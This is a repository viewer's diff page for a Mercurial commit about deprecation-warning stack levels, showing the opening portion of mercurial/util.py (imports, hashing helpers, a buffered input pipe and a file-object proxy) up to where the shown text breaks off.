##// END OF EJS Templates
util: set correct stack level on deprecation warnings...
Martin von Zweigbergk -
r37693:5b8a2607 default
parent child Browse files
Show More
@@ -1,3863 +1,3863 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import tempfile
34 import tempfile
35 import time
35 import time
36 import traceback
36 import traceback
37 import warnings
37 import warnings
38 import zlib
38 import zlib
39
39
40 from . import (
40 from . import (
41 encoding,
41 encoding,
42 error,
42 error,
43 i18n,
43 i18n,
44 node as nodemod,
44 node as nodemod,
45 policy,
45 policy,
46 pycompat,
46 pycompat,
47 urllibcompat,
47 urllibcompat,
48 )
48 )
49 from .utils import (
49 from .utils import (
50 dateutil,
50 dateutil,
51 procutil,
51 procutil,
52 stringutil,
52 stringutil,
53 )
53 )
54
54
55 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
56 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
57 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
58
58
59 b85decode = base85.b85decode
59 b85decode = base85.b85decode
60 b85encode = base85.b85encode
60 b85encode = base85.b85encode
61
61
62 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
63 empty = pycompat.empty
64 httplib = pycompat.httplib
64 httplib = pycompat.httplib
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def _rapply(f, xs):
138 def _rapply(f, xs):
139 if xs is None:
139 if xs is None:
140 # assume None means non-value of optional data
140 # assume None means non-value of optional data
141 return xs
141 return xs
142 if isinstance(xs, (list, set, tuple)):
142 if isinstance(xs, (list, set, tuple)):
143 return type(xs)(_rapply(f, x) for x in xs)
143 return type(xs)(_rapply(f, x) for x in xs)
144 if isinstance(xs, dict):
144 if isinstance(xs, dict):
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 return f(xs)
146 return f(xs)
147
147
148 def rapply(f, xs):
148 def rapply(f, xs):
149 """Apply function recursively to every item preserving the data structure
149 """Apply function recursively to every item preserving the data structure
150
150
151 >>> def f(x):
151 >>> def f(x):
152 ... return 'f(%s)' % x
152 ... return 'f(%s)' % x
153 >>> rapply(f, None) is None
153 >>> rapply(f, None) is None
154 True
154 True
155 >>> rapply(f, 'a')
155 >>> rapply(f, 'a')
156 'f(a)'
156 'f(a)'
157 >>> rapply(f, {'a'}) == {'f(a)'}
157 >>> rapply(f, {'a'}) == {'f(a)'}
158 True
158 True
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161
161
162 >>> xs = [object()]
162 >>> xs = [object()]
163 >>> rapply(pycompat.identity, xs) is xs
163 >>> rapply(pycompat.identity, xs) is xs
164 True
164 True
165 """
165 """
166 if f is pycompat.identity:
166 if f is pycompat.identity:
167 # fast path mainly for py2
167 # fast path mainly for py2
168 return xs
168 return xs
169 return _rapply(f, xs)
169 return _rapply(f, xs)
170
170
171 def bitsfrom(container):
171 def bitsfrom(container):
172 bits = 0
172 bits = 0
173 for bit in container:
173 for bit in container:
174 bits |= bit
174 bits |= bit
175 return bits
175 return bits
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 r'mercurial')
194 r'mercurial')
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 DeprecationWarning, r'mercurial')
196 DeprecationWarning, r'mercurial')
197 # TODO: reinvent imp.is_frozen()
197 # TODO: reinvent imp.is_frozen()
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
198 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 DeprecationWarning, r'mercurial')
199 DeprecationWarning, r'mercurial')
200
200
201 def nouideprecwarn(msg, version, stacklevel=1):
201 def nouideprecwarn(msg, version, stacklevel=1):
202 """Issue an python native deprecation warning
202 """Issue an python native deprecation warning
203
203
204 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
204 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
205 """
205 """
206 if _dowarn:
206 if _dowarn:
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
207 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 " update your code.)") % version
208 " update your code.)") % version
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
209 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210
210
211 DIGESTS = {
211 DIGESTS = {
212 'md5': hashlib.md5,
212 'md5': hashlib.md5,
213 'sha1': hashlib.sha1,
213 'sha1': hashlib.sha1,
214 'sha512': hashlib.sha512,
214 'sha512': hashlib.sha512,
215 }
215 }
216 # List of digest types from strongest to weakest
216 # List of digest types from strongest to weakest
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
217 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218
218
219 for k in DIGESTS_BY_STRENGTH:
219 for k in DIGESTS_BY_STRENGTH:
220 assert k in DIGESTS
220 assert k in DIGESTS
221
221
222 class digester(object):
222 class digester(object):
223 """helper to compute digests.
223 """helper to compute digests.
224
224
225 This helper can be used to compute one or more digests given their name.
225 This helper can be used to compute one or more digests given their name.
226
226
227 >>> d = digester([b'md5', b'sha1'])
227 >>> d = digester([b'md5', b'sha1'])
228 >>> d.update(b'foo')
228 >>> d.update(b'foo')
229 >>> [k for k in sorted(d)]
229 >>> [k for k in sorted(d)]
230 ['md5', 'sha1']
230 ['md5', 'sha1']
231 >>> d[b'md5']
231 >>> d[b'md5']
232 'acbd18db4cc2f85cedef654fccc4a4d8'
232 'acbd18db4cc2f85cedef654fccc4a4d8'
233 >>> d[b'sha1']
233 >>> d[b'sha1']
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 >>> digester.preferred([b'md5', b'sha1'])
235 >>> digester.preferred([b'md5', b'sha1'])
236 'sha1'
236 'sha1'
237 """
237 """
238
238
239 def __init__(self, digests, s=''):
239 def __init__(self, digests, s=''):
240 self._hashes = {}
240 self._hashes = {}
241 for k in digests:
241 for k in digests:
242 if k not in DIGESTS:
242 if k not in DIGESTS:
243 raise error.Abort(_('unknown digest type: %s') % k)
243 raise error.Abort(_('unknown digest type: %s') % k)
244 self._hashes[k] = DIGESTS[k]()
244 self._hashes[k] = DIGESTS[k]()
245 if s:
245 if s:
246 self.update(s)
246 self.update(s)
247
247
248 def update(self, data):
248 def update(self, data):
249 for h in self._hashes.values():
249 for h in self._hashes.values():
250 h.update(data)
250 h.update(data)
251
251
252 def __getitem__(self, key):
252 def __getitem__(self, key):
253 if key not in DIGESTS:
253 if key not in DIGESTS:
254 raise error.Abort(_('unknown digest type: %s') % k)
254 raise error.Abort(_('unknown digest type: %s') % k)
255 return nodemod.hex(self._hashes[key].digest())
255 return nodemod.hex(self._hashes[key].digest())
256
256
257 def __iter__(self):
257 def __iter__(self):
258 return iter(self._hashes)
258 return iter(self._hashes)
259
259
260 @staticmethod
260 @staticmethod
261 def preferred(supported):
261 def preferred(supported):
262 """returns the strongest digest type in both supported and DIGESTS."""
262 """returns the strongest digest type in both supported and DIGESTS."""
263
263
264 for k in DIGESTS_BY_STRENGTH:
264 for k in DIGESTS_BY_STRENGTH:
265 if k in supported:
265 if k in supported:
266 return k
266 return k
267 return None
267 return None
268
268
269 class digestchecker(object):
269 class digestchecker(object):
270 """file handle wrapper that additionally checks content against a given
270 """file handle wrapper that additionally checks content against a given
271 size and digests.
271 size and digests.
272
272
273 d = digestchecker(fh, size, {'md5': '...'})
273 d = digestchecker(fh, size, {'md5': '...'})
274
274
275 When multiple digests are given, all of them are validated.
275 When multiple digests are given, all of them are validated.
276 """
276 """
277
277
278 def __init__(self, fh, size, digests):
278 def __init__(self, fh, size, digests):
279 self._fh = fh
279 self._fh = fh
280 self._size = size
280 self._size = size
281 self._got = 0
281 self._got = 0
282 self._digests = dict(digests)
282 self._digests = dict(digests)
283 self._digester = digester(self._digests.keys())
283 self._digester = digester(self._digests.keys())
284
284
285 def read(self, length=-1):
285 def read(self, length=-1):
286 content = self._fh.read(length)
286 content = self._fh.read(length)
287 self._digester.update(content)
287 self._digester.update(content)
288 self._got += len(content)
288 self._got += len(content)
289 return content
289 return content
290
290
291 def validate(self):
291 def validate(self):
292 if self._size != self._got:
292 if self._size != self._got:
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
293 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 (self._size, self._got))
294 (self._size, self._got))
295 for k, v in self._digests.items():
295 for k, v in self._digests.items():
296 if v != self._digester[k]:
296 if v != self._digester[k]:
297 # i18n: first parameter is a digest name
297 # i18n: first parameter is a digest name
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
298 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 (k, v, self._digester[k]))
299 (k, v, self._digester[k]))
300
300
301 try:
301 try:
302 buffer = buffer
302 buffer = buffer
303 except NameError:
303 except NameError:
304 def buffer(sliceable, offset=0, length=None):
304 def buffer(sliceable, offset=0, length=None):
305 if length is not None:
305 if length is not None:
306 return memoryview(sliceable)[offset:offset + length]
306 return memoryview(sliceable)[offset:offset + length]
307 return memoryview(sliceable)[offset:]
307 return memoryview(sliceable)[offset:]
308
308
309 _chunksize = 4096
309 _chunksize = 4096
310
310
311 class bufferedinputpipe(object):
311 class bufferedinputpipe(object):
312 """a manually buffered input pipe
312 """a manually buffered input pipe
313
313
314 Python will not let us use buffered IO and lazy reading with 'polling' at
314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 the same time. We cannot probe the buffer state and select will not detect
315 the same time. We cannot probe the buffer state and select will not detect
316 that data are ready to read if they are already buffered.
316 that data are ready to read if they are already buffered.
317
317
318 This class let us work around that by implementing its own buffering
318 This class let us work around that by implementing its own buffering
319 (allowing efficient readline) while offering a way to know if the buffer is
319 (allowing efficient readline) while offering a way to know if the buffer is
320 empty from the output (allowing collaboration of the buffer with polling).
320 empty from the output (allowing collaboration of the buffer with polling).
321
321
322 This class lives in the 'util' module because it makes use of the 'os'
322 This class lives in the 'util' module because it makes use of the 'os'
323 module from the python stdlib.
323 module from the python stdlib.
324 """
324 """
325 def __new__(cls, fh):
325 def __new__(cls, fh):
326 # If we receive a fileobjectproxy, we need to use a variation of this
326 # If we receive a fileobjectproxy, we need to use a variation of this
327 # class that notifies observers about activity.
327 # class that notifies observers about activity.
328 if isinstance(fh, fileobjectproxy):
328 if isinstance(fh, fileobjectproxy):
329 cls = observedbufferedinputpipe
329 cls = observedbufferedinputpipe
330
330
331 return super(bufferedinputpipe, cls).__new__(cls)
331 return super(bufferedinputpipe, cls).__new__(cls)
332
332
333 def __init__(self, input):
333 def __init__(self, input):
334 self._input = input
334 self._input = input
335 self._buffer = []
335 self._buffer = []
336 self._eof = False
336 self._eof = False
337 self._lenbuf = 0
337 self._lenbuf = 0
338
338
339 @property
339 @property
340 def hasbuffer(self):
340 def hasbuffer(self):
341 """True is any data is currently buffered
341 """True is any data is currently buffered
342
342
343 This will be used externally a pre-step for polling IO. If there is
343 This will be used externally a pre-step for polling IO. If there is
344 already data then no polling should be set in place."""
344 already data then no polling should be set in place."""
345 return bool(self._buffer)
345 return bool(self._buffer)
346
346
347 @property
347 @property
348 def closed(self):
348 def closed(self):
349 return self._input.closed
349 return self._input.closed
350
350
351 def fileno(self):
351 def fileno(self):
352 return self._input.fileno()
352 return self._input.fileno()
353
353
354 def close(self):
354 def close(self):
355 return self._input.close()
355 return self._input.close()
356
356
357 def read(self, size):
357 def read(self, size):
358 while (not self._eof) and (self._lenbuf < size):
358 while (not self._eof) and (self._lenbuf < size):
359 self._fillbuffer()
359 self._fillbuffer()
360 return self._frombuffer(size)
360 return self._frombuffer(size)
361
361
362 def readline(self, *args, **kwargs):
362 def readline(self, *args, **kwargs):
363 if 1 < len(self._buffer):
363 if 1 < len(self._buffer):
364 # this should not happen because both read and readline end with a
364 # this should not happen because both read and readline end with a
365 # _frombuffer call that collapse it.
365 # _frombuffer call that collapse it.
366 self._buffer = [''.join(self._buffer)]
366 self._buffer = [''.join(self._buffer)]
367 self._lenbuf = len(self._buffer[0])
367 self._lenbuf = len(self._buffer[0])
368 lfi = -1
368 lfi = -1
369 if self._buffer:
369 if self._buffer:
370 lfi = self._buffer[-1].find('\n')
370 lfi = self._buffer[-1].find('\n')
371 while (not self._eof) and lfi < 0:
371 while (not self._eof) and lfi < 0:
372 self._fillbuffer()
372 self._fillbuffer()
373 if self._buffer:
373 if self._buffer:
374 lfi = self._buffer[-1].find('\n')
374 lfi = self._buffer[-1].find('\n')
375 size = lfi + 1
375 size = lfi + 1
376 if lfi < 0: # end of file
376 if lfi < 0: # end of file
377 size = self._lenbuf
377 size = self._lenbuf
378 elif 1 < len(self._buffer):
378 elif 1 < len(self._buffer):
379 # we need to take previous chunks into account
379 # we need to take previous chunks into account
380 size += self._lenbuf - len(self._buffer[-1])
380 size += self._lenbuf - len(self._buffer[-1])
381 return self._frombuffer(size)
381 return self._frombuffer(size)
382
382
383 def _frombuffer(self, size):
383 def _frombuffer(self, size):
384 """return at most 'size' data from the buffer
384 """return at most 'size' data from the buffer
385
385
386 The data are removed from the buffer."""
386 The data are removed from the buffer."""
387 if size == 0 or not self._buffer:
387 if size == 0 or not self._buffer:
388 return ''
388 return ''
389 buf = self._buffer[0]
389 buf = self._buffer[0]
390 if 1 < len(self._buffer):
390 if 1 < len(self._buffer):
391 buf = ''.join(self._buffer)
391 buf = ''.join(self._buffer)
392
392
393 data = buf[:size]
393 data = buf[:size]
394 buf = buf[len(data):]
394 buf = buf[len(data):]
395 if buf:
395 if buf:
396 self._buffer = [buf]
396 self._buffer = [buf]
397 self._lenbuf = len(buf)
397 self._lenbuf = len(buf)
398 else:
398 else:
399 self._buffer = []
399 self._buffer = []
400 self._lenbuf = 0
400 self._lenbuf = 0
401 return data
401 return data
402
402
403 def _fillbuffer(self):
403 def _fillbuffer(self):
404 """read data to the buffer"""
404 """read data to the buffer"""
405 data = os.read(self._input.fileno(), _chunksize)
405 data = os.read(self._input.fileno(), _chunksize)
406 if not data:
406 if not data:
407 self._eof = True
407 self._eof = True
408 else:
408 else:
409 self._lenbuf += len(data)
409 self._lenbuf += len(data)
410 self._buffer.append(data)
410 self._buffer.append(data)
411
411
412 return data
412 return data
413
413
414 def mmapread(fp):
414 def mmapread(fp):
415 try:
415 try:
416 fd = getattr(fp, 'fileno', lambda: fp)()
416 fd = getattr(fp, 'fileno', lambda: fp)()
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 except ValueError:
418 except ValueError:
419 # Empty files cannot be mmapped, but mmapread should still work. Check
419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 # if the file is empty, and if so, return an empty buffer.
420 # if the file is empty, and if so, return an empty buffer.
421 if os.fstat(fd).st_size == 0:
421 if os.fstat(fd).st_size == 0:
422 return ''
422 return ''
423 raise
423 raise
424
424
425 class fileobjectproxy(object):
425 class fileobjectproxy(object):
426 """A proxy around file objects that tells a watcher when events occur.
426 """A proxy around file objects that tells a watcher when events occur.
427
427
428 This type is intended to only be used for testing purposes. Think hard
428 This type is intended to only be used for testing purposes. Think hard
429 before using it in important code.
429 before using it in important code.
430 """
430 """
431 __slots__ = (
431 __slots__ = (
432 r'_orig',
432 r'_orig',
433 r'_observer',
433 r'_observer',
434 )
434 )
435
435
436 def __init__(self, fh, observer):
436 def __init__(self, fh, observer):
437 object.__setattr__(self, r'_orig', fh)
437 object.__setattr__(self, r'_orig', fh)
438 object.__setattr__(self, r'_observer', observer)
438 object.__setattr__(self, r'_observer', observer)
439
439
440 def __getattribute__(self, name):
440 def __getattribute__(self, name):
441 ours = {
441 ours = {
442 r'_observer',
442 r'_observer',
443
443
444 # IOBase
444 # IOBase
445 r'close',
445 r'close',
446 # closed if a property
446 # closed if a property
447 r'fileno',
447 r'fileno',
448 r'flush',
448 r'flush',
449 r'isatty',
449 r'isatty',
450 r'readable',
450 r'readable',
451 r'readline',
451 r'readline',
452 r'readlines',
452 r'readlines',
453 r'seek',
453 r'seek',
454 r'seekable',
454 r'seekable',
455 r'tell',
455 r'tell',
456 r'truncate',
456 r'truncate',
457 r'writable',
457 r'writable',
458 r'writelines',
458 r'writelines',
459 # RawIOBase
459 # RawIOBase
460 r'read',
460 r'read',
461 r'readall',
461 r'readall',
462 r'readinto',
462 r'readinto',
463 r'write',
463 r'write',
464 # BufferedIOBase
464 # BufferedIOBase
465 # raw is a property
465 # raw is a property
466 r'detach',
466 r'detach',
467 # read defined above
467 # read defined above
468 r'read1',
468 r'read1',
469 # readinto defined above
469 # readinto defined above
470 # write defined above
470 # write defined above
471 }
471 }
472
472
473 # We only observe some methods.
473 # We only observe some methods.
474 if name in ours:
474 if name in ours:
475 return object.__getattribute__(self, name)
475 return object.__getattribute__(self, name)
476
476
477 return getattr(object.__getattribute__(self, r'_orig'), name)
477 return getattr(object.__getattribute__(self, r'_orig'), name)
478
478
479 def __nonzero__(self):
479 def __nonzero__(self):
480 return bool(object.__getattribute__(self, r'_orig'))
480 return bool(object.__getattribute__(self, r'_orig'))
481
481
482 __bool__ = __nonzero__
482 __bool__ = __nonzero__
483
483
484 def __delattr__(self, name):
484 def __delattr__(self, name):
485 return delattr(object.__getattribute__(self, r'_orig'), name)
485 return delattr(object.__getattribute__(self, r'_orig'), name)
486
486
487 def __setattr__(self, name, value):
487 def __setattr__(self, name, value):
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
488 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489
489
490 def __iter__(self):
490 def __iter__(self):
491 return object.__getattribute__(self, r'_orig').__iter__()
491 return object.__getattribute__(self, r'_orig').__iter__()
492
492
493 def _observedcall(self, name, *args, **kwargs):
493 def _observedcall(self, name, *args, **kwargs):
494 # Call the original object.
494 # Call the original object.
495 orig = object.__getattribute__(self, r'_orig')
495 orig = object.__getattribute__(self, r'_orig')
496 res = getattr(orig, name)(*args, **kwargs)
496 res = getattr(orig, name)(*args, **kwargs)
497
497
498 # Call a method on the observer of the same name with arguments
498 # Call a method on the observer of the same name with arguments
499 # so it can react, log, etc.
499 # so it can react, log, etc.
500 observer = object.__getattribute__(self, r'_observer')
500 observer = object.__getattribute__(self, r'_observer')
501 fn = getattr(observer, name, None)
501 fn = getattr(observer, name, None)
502 if fn:
502 if fn:
503 fn(res, *args, **kwargs)
503 fn(res, *args, **kwargs)
504
504
505 return res
505 return res
506
506
507 def close(self, *args, **kwargs):
507 def close(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
508 return object.__getattribute__(self, r'_observedcall')(
509 r'close', *args, **kwargs)
509 r'close', *args, **kwargs)
510
510
511 def fileno(self, *args, **kwargs):
511 def fileno(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
512 return object.__getattribute__(self, r'_observedcall')(
513 r'fileno', *args, **kwargs)
513 r'fileno', *args, **kwargs)
514
514
515 def flush(self, *args, **kwargs):
515 def flush(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
516 return object.__getattribute__(self, r'_observedcall')(
517 r'flush', *args, **kwargs)
517 r'flush', *args, **kwargs)
518
518
519 def isatty(self, *args, **kwargs):
519 def isatty(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
520 return object.__getattribute__(self, r'_observedcall')(
521 r'isatty', *args, **kwargs)
521 r'isatty', *args, **kwargs)
522
522
523 def readable(self, *args, **kwargs):
523 def readable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
524 return object.__getattribute__(self, r'_observedcall')(
525 r'readable', *args, **kwargs)
525 r'readable', *args, **kwargs)
526
526
527 def readline(self, *args, **kwargs):
527 def readline(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
528 return object.__getattribute__(self, r'_observedcall')(
529 r'readline', *args, **kwargs)
529 r'readline', *args, **kwargs)
530
530
531 def readlines(self, *args, **kwargs):
531 def readlines(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
532 return object.__getattribute__(self, r'_observedcall')(
533 r'readlines', *args, **kwargs)
533 r'readlines', *args, **kwargs)
534
534
535 def seek(self, *args, **kwargs):
535 def seek(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
536 return object.__getattribute__(self, r'_observedcall')(
537 r'seek', *args, **kwargs)
537 r'seek', *args, **kwargs)
538
538
539 def seekable(self, *args, **kwargs):
539 def seekable(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
540 return object.__getattribute__(self, r'_observedcall')(
541 r'seekable', *args, **kwargs)
541 r'seekable', *args, **kwargs)
542
542
543 def tell(self, *args, **kwargs):
543 def tell(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
544 return object.__getattribute__(self, r'_observedcall')(
545 r'tell', *args, **kwargs)
545 r'tell', *args, **kwargs)
546
546
547 def truncate(self, *args, **kwargs):
547 def truncate(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
548 return object.__getattribute__(self, r'_observedcall')(
549 r'truncate', *args, **kwargs)
549 r'truncate', *args, **kwargs)
550
550
551 def writable(self, *args, **kwargs):
551 def writable(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
552 return object.__getattribute__(self, r'_observedcall')(
553 r'writable', *args, **kwargs)
553 r'writable', *args, **kwargs)
554
554
555 def writelines(self, *args, **kwargs):
555 def writelines(self, *args, **kwargs):
556 return object.__getattribute__(self, r'_observedcall')(
556 return object.__getattribute__(self, r'_observedcall')(
557 r'writelines', *args, **kwargs)
557 r'writelines', *args, **kwargs)
558
558
559 def read(self, *args, **kwargs):
559 def read(self, *args, **kwargs):
560 return object.__getattribute__(self, r'_observedcall')(
560 return object.__getattribute__(self, r'_observedcall')(
561 r'read', *args, **kwargs)
561 r'read', *args, **kwargs)
562
562
563 def readall(self, *args, **kwargs):
563 def readall(self, *args, **kwargs):
564 return object.__getattribute__(self, r'_observedcall')(
564 return object.__getattribute__(self, r'_observedcall')(
565 r'readall', *args, **kwargs)
565 r'readall', *args, **kwargs)
566
566
567 def readinto(self, *args, **kwargs):
567 def readinto(self, *args, **kwargs):
568 return object.__getattribute__(self, r'_observedcall')(
568 return object.__getattribute__(self, r'_observedcall')(
569 r'readinto', *args, **kwargs)
569 r'readinto', *args, **kwargs)
570
570
571 def write(self, *args, **kwargs):
571 def write(self, *args, **kwargs):
